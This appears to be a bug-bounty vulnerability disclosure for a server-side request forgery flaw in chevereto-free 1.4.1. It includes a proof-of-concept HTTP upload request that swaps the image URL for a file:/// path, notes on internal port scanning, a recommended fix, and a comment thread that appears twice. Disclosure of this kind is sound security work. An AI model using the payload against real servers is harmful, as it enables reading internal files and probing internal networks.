Server-Side Request Forgery (SSRF) in chevereto/chevereto-free

Valid

Reported on

Oct 2nd 2021

Description

Attackers can make the server perform arbitrary requests to internal IPs as well as use the file:/// protocol to disclose internal image data.

Proof of Concept

1: Create a valid image file on the server /path/to/index.png

2: Choose add Image URLs and use a valid URL and click OK. Then click Upload and intercept the request:

3: Now change the source to file:///path/to/index.png

/POST /Chevereto-Free-1.4.1/json HTTP/1.1

Host: 10.0.2.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33931558783514564834640665316
Content-Length: 811
Origin: http://10.0.2.15
Connection: close
Referer: http://10.0.2.15/Chevereto-Free-1.4.1/upload

-----------------------------33931558783514564834640665316

Content-Disposition: form-data; name="source"
file:///path/to/index.png

-----------------------------33931558783514564834640665316

Content-Disposition: form-data; name="type"

url
-----------------------------33931558783514564834640665316

Content-Disposition: form-data; name="action"

upload

-----------------------------33931558783514564834640665316

Content-Disposition: form-data; name="timestamp"

163316178669
-----------------------------33931558783514564834640665316

Content-Disposition: form-data; name="auth_token"
31f259f774280b6687c97d04f80a9410c948594e

-----------------------------33931558783514564834640665316
Content-Disposition: form-data; name="nsfw"
0
-----------------------------33931558783514564834640665316--

4: The index.jpg on the local filesystem should be uploaded.

Impact

This vulnerability is capable of leaking internal image files from the server, perform internal portscans as well as interact with internal webservers.

Recommended Fix

Block the file:// protocol and the internal ip ranges

127.0.0.0 – 127.255.255.255

10.0.0.0 - 10.255.255.255

172.16.0.0 - 172.31.255.255

192.168.0.0 - 192.168.255.255

169.254.169.254

We have contacted a member of the chevereto/chevereto-free team and are waiting to hear back a year ago

A chevereto/chevereto-free maintainer validated this vulnerability a year ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

A chevereto/chevereto-free maintainer marked this as fixed with commit 9e2262 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

haxatron

commented a year ago

Researcher

Hi there, thanks for validating the report, instead of only blocking the file:// protocol, you should whitelist http:// and https://

amammad

commented a year ago

@maintainer @admin

why my report with same vulnerability was not approved ?

@maintainer instead of ask me for more information just She insulted me ….

https://huntr.dev/bounties/6b170fbc-49f6-44bb-bcb9-498057f71090/

Very interesting ....

to join this conversation

We have contacted a member of the chevereto/chevereto-free team and are waiting to hear back a year ago

A chevereto/chevereto-free maintainer validated this vulnerability a year ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

A chevereto/chevereto-free maintainer marked this as fixed with commit 9e2262 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

haxatron

commented a year ago

Researcher

Hi there, thanks for validating the report, instead of only blocking the file:// protocol, you should whitelist http:// and https://

amammad

commented a year ago

@maintainer @admin

why my report with same vulnerability was not approved ?

@maintainer instead of ask me for more information just She insulted me ….

https://huntr.dev/bounties/6b170fbc-49f6-44bb-bcb9-498057f71090/

Very interesting ....

to join this conversation